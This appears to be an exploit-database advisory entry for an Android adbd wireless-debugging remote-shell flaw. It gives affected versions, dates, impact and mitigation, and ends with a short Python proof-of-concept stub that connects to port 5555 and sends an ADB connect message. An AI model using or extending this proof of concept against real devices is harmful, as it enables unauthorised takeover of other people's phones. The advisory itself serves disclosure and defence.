cd ../exploit-db
    root@mhfh:~#cat /var/db/exploits/CVE-2026-0073.json
    exploits/CVE-2026-0073.md
    CVE-2026-0073AndroidRCECritical

    adbd wireless debugging remote shell

    affected
    14-16
    disclosed
    2026-05-05
    discovered
    2026-04-12
    patched
    May 2026 Android Security Bulletin
    author
    mhfh research
    platform
    Android

    ## description

    A logic vulnerability in the adbd daemon allows an unauthenticated attacker on the same network to gain a remote shell when wireless debugging is enabled, bypassing the pairing requirement.

    ## impact

    Full device compromise via remote shell. Attacker gains identity of shell user.

    ## mitigation

    Disable wireless debugging when not in use. Update to May 2026 patch level.

    ## proof of concept

    # Usage: python3 cve-2026-0073-exploit.py --target [IP] --port 5555
    import socket
    # Simplified trigger: bypass adb auth handshake
    def trigger(target, port):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.send(b"CNXNhost::\x00")
        print(s.recv(1024))